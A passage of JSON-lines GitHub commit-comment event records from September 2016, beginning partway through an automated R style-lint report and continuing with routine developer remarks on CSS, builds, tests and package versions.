~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n"}},"created_at":"2016-09-20T20:01:07Z"}
{"id":"4592116843","type":"CommitCommentEvent","actor":{"login":"ficticius"},"repo":{"name":"PrestaShop/PrestaShop"},"payload":{"comment":{"id":19103032,"position":null,"line":null,"path":null,"commit_id":"006dcbee13a492d0cad566dc9ea634e100fc8b00","created_at":"2016-09-20T20:01:23Z","updated_at":"2016-09-20T20:01:23Z","body":"why change the second section of code? is identical! this doesnt work for me, sorry!"}},"created_at":"2016-09-20T20:01:23Z"}
{"id":"4592128519","type":"CommitCommentEvent","actor":{"login":"sperez8"},"repo":{"name":"fratamico/feature-engineering-tool"},"payload":{"comment":{"id":19103057,"position":null,"line":null,"path":null,"commit_id":"bab2d1b307418ee8cd3739306df646c65b705c14","created_at":"2016-09-20T20:03:18Z","updated_at":"2016-09-20T20:03:18Z","body":"I removed the All Testing (commented out in the code) and similar merged events because they included model type of events such as \"connected\" and \"firestarted\". These types of event could occur during student building and aren't explicitly events that tell us that the student is conducting a test.\r\n\r\nThe current merged events include:\r\n- User testing with voltmeter (dragging voltmeter probes)\r\n- User testing with non contact ammeter (dragging ammeter probes)\r\n- User testing with series ammeter (adding component)\r\n- User all testing actions (merged events from three groups above)\r\n- instruments detect change (anytime the voltmeter or ammeter changes value)\r\n- all resistor editor events (@fratamico, do happen to now what the difference is between user.resistorEditor and user.resistivity events?)\r\n- resistor dragging events\r\n- Building type actions (was a previous preset, except I remove the \"add series ammeter\" component since that's not really building.)"}},"created_at":"2016-09-20T20:03:18Z"}
{"id":"4592130558","type":"CommitCommentEvent","actor":{"login":"jhb123"},"repo":{"name":"Elthron/Perudo"},"payload":{"comment":{"id":19103069,"position":null,"line":null,"path":null,"commit_id":"c9ecbe2bc6041ea16eb7875aa6dd170fc65aeae3","created_at":"2016-09-20T20:03:40Z","updated_at":"2016-09-20T20:03:40Z","body":"I meant to also write \"... as well as a test of the client, which are testServer and testClient\"."}},"created_at":"2016-09-20T20:03:40Z"}
{"id":"4592135953","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"srophe/srophe-admin"},"payload":{"comment":{"id":19103081,"position":null,"line":null,"path":null,"commit_id":"ffcbdd44c74f1dfef900e4251a003bf59437fd74","created_at":"2016-09-20T20:04:40Z","updated_at":"2016-09-20T20:04:40Z","body":"Exciting! Can't wait to see more!"}},"created_at":"2016-09-20T20:04:40Z"}
{"id":"4592139224","type":"CommitCommentEvent","actor":{"login":"3x7r3m157"},"repo":{"name":"3x7r3m157/bloccit"},"payload":{"comment":{"id":19103091,"position":null,"line":null,"path":null,"commit_id":"708028e3d22b7ebafe705dc80ece1e746eab2726","created_at":"2016-09-20T20:05:05Z","updated_at":"2016-09-20T20:05:05Z","body":"Just came up with it while trying to think of a username in 1337 for something years and years ago. The handle just kind of stuck around. But there is some significance in being an extremist which is something I’ve been called many times. Not necessarily because of any specific ideological or political belief, it relates more or less to how I seem to have a tendency to get completely obsessed with my interests and hold myself to ridiculous standards in pursuing them…to an extreme. Idk I think it might come off as elitist but I’m just very very passionate about what I’m passionate about and I think that the world is plagued by mediocrity.  \n\n> On Sep 20, 2016, at 2:47 PM, Mark Carpenter <notifications@github.com> wrote:\n> \n> I meant to ask.... what's the story behind your github username?\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/3x7r3m157/bloccit/commit/708028e3d22b7ebafe705dc80ece1e746eab2726#commitcomment-19102851>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AJhNPtYLtirciGVCDwtxHixgT3MsgX_Lks5qsDhvgaJpZM4KCD9t>.\n> \n\n"}},"created_at":"2016-09-20T20:05:05Z"}
{"id":"4592143130","type":"CommitCommentEvent","actor":{"login":"oddtopus"},"repo":{"name":"oddtopus/flamingo"},"payload":{"comment":{"id":19103114,"position":null,"line":null,"path":null,"commit_id":"4e725ad7b6d01fec9c42100692958514558de508","created_at":"2016-09-20T20:05:49Z","updated_at":"2016-09-20T20:05:49Z","body":"Hi @yorikvanhavre\r\nI read today your post about pipe tool in Arch and... look at the new workbench in Flamingos!\r\nI should rename it to \"pypeTools\" or \"p.t. II\" because I committed after you :-)\r\nIt is not complete yet but I'm going to write a short tutorial to show the basics. It also has a philosophy a bit different from frameTools.\r\nI'm courious to see how you made the insertion of curves because I struggled a while on it.\r\nIf you have comments for better integration of new objects \"FeaturePython\" with your job I'll be pleased to include them."}},"created_at":"2016-09-20T20:05:49Z"}
{"id":"4592149960","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19103126,"position":null,"line":null,"path":null,"commit_id":"3ae29ff6b267ddbad0b8e70897444d3ec29137a7","created_at":"2016-09-20T20:07:08Z","updated_at":"2016-09-20T20:07:08Z","body":"Can you push your example csharp file. Also does the cmake work for it? Basically how should I compile I was doing it differently before the merge.\r\n"}},"created_at":"2016-09-20T20:07:08Z"}
{"id":"4592156963","type":"CommitCommentEvent","actor":{"login":"Apercu"},"repo":{"name":"SIGSEV/minus"},"payload":{"comment":{"id":19103138,"position":5,"line":25,"path":"webpack/build.js","commit_id":"758c874421cf5193e7a9fff26446d2ea66e82ee9","created_at":"2016-09-20T20:08:20Z","updated_at":"2016-09-20T20:08:20Z","body":"True, I tested it unsuccessfully with a `loaders` parameter and assumed an array wouldn't work in `loader`, but was wrong. Commit inc 😉 "}},"created_at":"2016-09-20T20:08:20Z"}
{"id":"4592157110","type":"CommitCommentEvent","actor":{"login":"YuKitAs"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19103139,"position":11,"line":22,"path":"src/test/java/xigua/battle/of/elements/model/IntWithMaxTest.java","commit_id":"b73ddd838883b86ca471051182b84c09ef479f7c","created_at":"2016-09-20T20:08:21Z","updated_at":"2016-09-20T20:08:21Z","body":"Fixed in f993cdd18fd4f3b1277eade2384bf9fea9dac3a0."}},"created_at":"2016-09-20T20:08:21Z"}
{"id":"4592160377","type":"CommitCommentEvent","actor":{"login":"YuKitAs"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19103151,"position":18,"line":18,"path":"src/test/java/xigua/battle/of/elements/model/battle/EnvironmentTest.java","commit_id":"f0781a04b10e34069b224f81fed0413c87bc7693","created_at":"2016-09-20T20:08:53Z","updated_at":"2016-09-20T20:08:53Z","body":"Fixed in f993cdd18fd4f3b1277eade2384bf9fea9dac3a0."}},"created_at":"2016-09-20T20:08:53Z"}
{"id":"4592160448","type":"CommitCommentEvent","actor":{"login":"tboerger"},"repo":{"name":"foopoiuyt/drone-gh-pages"},"payload":{"comment":{"id":19103152,"position":1,"line":1,"path":"types.go","commit_id":"ce96d1b73717fa8127349bedcf41c6dd6c03430f","created_at":"2016-09-20T20:08:53Z","updated_at":"2016-09-20T20:08:53Z","body":"We dropped this file for the other plugins "}},"created_at":"2016-09-20T20:08:53Z"}
{"id":"4592161643","type":"CommitCommentEvent","actor":{"login":"bigglet"},"repo":{"name":"dan-mannion/y4proj"},"payload":{"comment":{"id":19103155,"position":null,"line":null,"path":null,"commit_id":"77600b48882d3643284a83a3b4a85974fae75d3e","created_at":"2016-09-20T20:09:05Z","updated_at":"2016-09-20T20:09:05Z","body":"THATS THE PLAN! Do you have other incentives for this project!!!!\n\nOn Tue, Sep 20, 2016 at 8:52 PM, dan-mannion <notifications@github.com>\nwrote:\n\n> OH MA GOD WE'RE BUILDING A BRAIN\n>\n> [image: alt text]\n> <https://camo.githubusercontent.com/9f36c43818f7c11cc8b6851511000ffd9adf9b7e/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6c6f777265732e636172746f6f6e73746f636b2e636f6d2f736f6369616c2d6973737565732d636f6d70757465725f636869702d676f7665726e6d656e745f696e746572666572656e63652d676f7665726e6d656e74732d627261696e5f636f6e74726f6c732d696d706c616e74732d726d616e31343933375f6c6f772e6a7067>\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dan-mannion/y4proj/commit/77600b48882d3643284a83a3b4a85974fae75d3e#commitcomment-19102927>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVNOBeA5-XvR2BwM_Q8woo2Jd_GVpNpOks5qsDmQgaJpZM4KCEXS>\n> .\n>\n"}},"created_at":"2016-09-20T20:09:05Z"}
{"id":"4592169906","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19103171,"position":7,"line":18,"path":"src/test/java/xigua/battle/of/elements/model/battle/EnvironmentTest.java","commit_id":"f993cdd18fd4f3b1277eade2384bf9fea9dac3a0","created_at":"2016-09-20T20:10:33Z","updated_at":"2016-09-20T20:10:33Z","body":"所有的元素尽量直接列在后面。"}},"created_at":"2016-09-20T20:10:33Z"}
{"id":"4592170601","type":"CommitCommentEvent","actor":{"login":"ncopa"},"repo":{"name":"gliderlabs/docker-alpine"},"payload":{"comment":{"id":19103172,"position":null,"line":null,"path":null,"commit_id":"a32a44b699ac5b973360d65141b84550d58eb14c","created_at":"2016-09-20T20:10:41Z","updated_at":"2016-09-20T20:10:41Z","body":"@frol I think they are pushed. Its only the scanner that gives false positive. It has been reported and I expect it to be fixed tomorrow. `openssl-1.0.2h-r4` has the fix.\r\n\r\n````\r\nncopa-desktop:~$ docker run --rm -it alpine:3.4 apk version libssl1.0\r\nWARNING: Ignoring APKINDEX.167438ca.tar.gz: No such file or directory\r\nWARNING: Ignoring APKINDEX.a2e6dac0.tar.gz: No such file or directory\r\nInstalled:                                Available:\r\nlibssl1.0-1.0.2h-r4                     ?  \r\n````"}},"created_at":"2016-09-20T20:10:41Z"}
{"id":"4592171748","type":"CommitCommentEvent","actor":{"login":"spaceloop123"},"repo":{"name":"zidabah/university_labs"},"payload":{"comment":{"id":19103175,"position":10,"line":10,"path":"Lab3_12/src/com/company/InputFile.java","commit_id":"b33414a00ce64ea4883dc42a490df9586cd63fb0","created_at":"2016-09-20T20:10:54Z","updated_at":"2016-09-20T20:10:54Z","body":"Почему нет модификатора доступа?"}},"created_at":"2016-09-20T20:10:54Z"}
{"id":"4592172579","type":"CommitCommentEvent","actor":{"login":"smeroni68"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19103181,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-20T20:11:03Z","updated_at":"2016-09-20T20:11:03Z","body":"Build flashed, GSM on I9505 it's fine on multi-device."}},"created_at":"2016-09-20T20:11:03Z"}
{"id":"4592173534","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"rtaykowski/fewd-final-project"},"payload":{"comment":{"id":19103186,"position":18,"line":297,"path":"css/style.css","commit_id":"6bef90ecaf2ad16aee66db746b2a93ff201b76c8","created_at":"2016-09-20T20:11:13Z","updated_at":"2016-09-20T20:11:13Z","body":"try setting this to `position:static;` , that way the hamburger menu will be absolutely positioned relative to the `header`"}},"created_at":"2016-09-20T20:11:13Z"}
{"id":"4592175334","type":"CommitCommentEvent","actor":{"login":"SirArslaan"},"repo":{"name":"golpe-de-remo/prework-simple-button"},"payload":{"comment":{"id":19103188,"position":8,"line":8,"path":"PaddleButton/src/App.js","commit_id":"7759ee62c565ea86bb285795117f96c12d030bac","created_at":"2016-09-20T20:11:32Z","updated_at":"2016-09-20T20:11:32Z","body":"![Sweet](http://i.giphy.com/ry16t3EfWpD3O.gif)"}},"created_at":"2016-09-20T20:11:32Z"}
{"id":"4592175697","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"rtaykowski/fewd-final-project"},"payload":{"comment":{"id":19103190,"position":51,"line":315,"path":"css/style.css","commit_id":"6bef90ecaf2ad16aee66db746b2a93ff201b76c8","created_at":"2016-09-20T20:11:36Z","updated_at":"2016-09-20T20:11:36Z","body":"try setting `top:0em` so it goes to the top of the `header` element"}},"created_at":"2016-09-20T20:11:36Z"}
{"id":"4592176500","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19103194,"position":null,"line":null,"path":null,"commit_id":"33292be60050185d98dcfc765c1d5972362ff6b9","created_at":"2016-09-20T20:11:44Z","updated_at":"2016-09-20T20:11:44Z","body":"ASIHP-validation1 (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2373 of 2373 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T20:11:44Z"}
{"id":"4592179098","type":"CommitCommentEvent","actor":{"login":"YuKitAs"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":19103200,"position":7,"line":18,"path":"src/test/java/xigua/battle/of/elements/model/battle/EnvironmentTest.java","commit_id":"f993cdd18fd4f3b1277eade2384bf9fea9dac3a0","created_at":"2016-09-20T20:12:13Z","updated_at":"2016-09-20T20:12:13Z","body":"Fixed in 0f184d8542a123ac6199250bc36375f3ccd0d058."}},"created_at":"2016-09-20T20:12:13Z"}
{"id":"4592180009","type":"CommitCommentEvent","actor":{"login":"petevine"},"repo":{"name":"rust-lang/rust"},"payload":{"comment":{"id":19103201,"position":null,"line":null,"path":null,"commit_id":"5e9149d73f7d2912079f08e48eb257e8a6d4f0b3","created_at":"2016-09-20T20:12:23Z","updated_at":"2016-09-20T20:12:23Z","body":"This addition broke `make install` for me, probably related to `--disable-docs`."}},"created_at":"2016-09-20T20:12:23Z"}
{"id":"4592181319","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103204,"position":1,"line":1,"path":"game_data.rb","commit_id":"731fe25eb1b7eb5af00aa68b92c39556677fb1c4","created_at":"2016-09-20T20:12:37Z","updated_at":"2016-09-20T20:12:37Z","body":"update to gate with e prefix"}},"created_at":"2016-09-20T20:12:37Z"}
{"id":"4592182255","type":"CommitCommentEvent","actor":{"login":"spaceloop123"},"repo":{"name":"zidabah/university_labs"},"payload":{"comment":{"id":19103207,"position":10,"line":10,"path":"Lab3_12/src/com/company/InputFile.java","commit_id":"b33414a00ce64ea4883dc42a490df9586cd63fb0","created_at":"2016-09-20T20:12:47Z","updated_at":"2016-09-20T20:12:47Z","body":"И вообще зачем эта штука здесь объявляется, если она используется только в методе inputFile() ?"}},"created_at":"2016-09-20T20:12:47Z"}
{"id":"4592184229","type":"CommitCommentEvent","actor":{"login":"mwhittaker"},"repo":{"name":"mwhittaker/aries"},"payload":{"comment":{"id":19103211,"position":null,"line":null,"path":null,"commit_id":"28ba36e9e4c1445f5e2e3a235efdfcc264a2a022","created_at":"2016-09-20T20:13:10Z","updated_at":"2016-09-20T20:13:10Z","body":":heart_eyes: "}},"created_at":"2016-09-20T20:13:10Z"}
{"id":"4592186415","type":"CommitCommentEvent","actor":{"login":"littlebalup"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":19103218,"position":null,"line":null,"path":null,"commit_id":"a5a12502ac99cf1a2e402b5989861e900f89ab23","created_at":"2016-09-20T20:13:35Z","updated_at":"2016-09-20T20:13:35Z","body":"@TheOfficialFloW, could you share your modified appmgr.h ?.. or pull it on vitasdk?\r\nhttp://image.prntscr.com/image/aca4ff5b0dbd4a3190bf37c7682df1dc.png\r\n"}},"created_at":"2016-09-20T20:13:35Z"}
{"id":"4592186954","type":"CommitCommentEvent","actor":{"login":"vanmelick"},"repo":{"name":"textpattern/textpacks"},"payload":{"comment":{"id":19103219,"position":null,"line":null,"path":null,"commit_id":"c0c124f0ed8a6c393188eaac641cc20932b3ebc1","created_at":"2016-09-20T20:13:41Z","updated_at":"2016-09-20T20:13:41Z","body":"Things like 'character_set_client' are MySQL variable names. Translating those only creates confusion. Just leave them as-is. At least then people can Google for them and find meaningful info.\r\n\r\nhttp://dev.mysql.com/doc/refman/5.7/en/server-system-variables.html#sysvar_character_set_client"}},"created_at":"2016-09-20T20:13:41Z"}
{"id":"4592187256","type":"CommitCommentEvent","actor":{"login":"xKarloS2"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":19103220,"position":null,"line":null,"path":null,"commit_id":"d084a35862d13356e1cf237ff36c44c97448c78f","created_at":"2016-09-20T20:13:44Z","updated_at":"2016-09-20T20:13:44Z","body":"Good Job @timabbott :D"}},"created_at":"2016-09-20T20:13:44Z"}
{"id":"4592188191","type":"CommitCommentEvent","actor":{"login":"omiroshnichenko"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19103224,"position":null,"line":null,"path":null,"commit_id":"488bfdfff7c51824d9a4a2c1061019b3b35b2d72","created_at":"2016-09-20T20:13:55Z","updated_at":"2016-09-20T20:13:55Z","body":"@otg-chris Please, look at the parent commit."}},"created_at":"2016-09-20T20:13:55Z"}
{"id":"4592189742","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"rtaykowski/fewd-final-project"},"payload":{"comment":{"id":19103228,"position":11,"line":31,"path":"css/style.css","commit_id":"6bef90ecaf2ad16aee66db746b2a93ff201b76c8","created_at":"2016-09-20T20:14:12Z","updated_at":"2016-09-20T20:14:12Z","body":"I would get rid of the  following from your `.hero-links` rule\r\n```  \r\ntop: 50%;\r\n transform: translateY(-50%);\r\n```"}},"created_at":"2016-09-20T20:14:12Z"}
{"id":"4592190513","type":"CommitCommentEvent","actor":{"login":"Keno"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":19103231,"position":null,"line":null,"path":null,"commit_id":"539c64c3861bf49c468faccf2467a0ab3db80f16","created_at":"2016-09-20T20:14:20Z","updated_at":"2016-09-20T20:14:20Z","body":"Is there a test we could add that would have triggered this?"}},"created_at":"2016-09-20T20:14:20Z"}
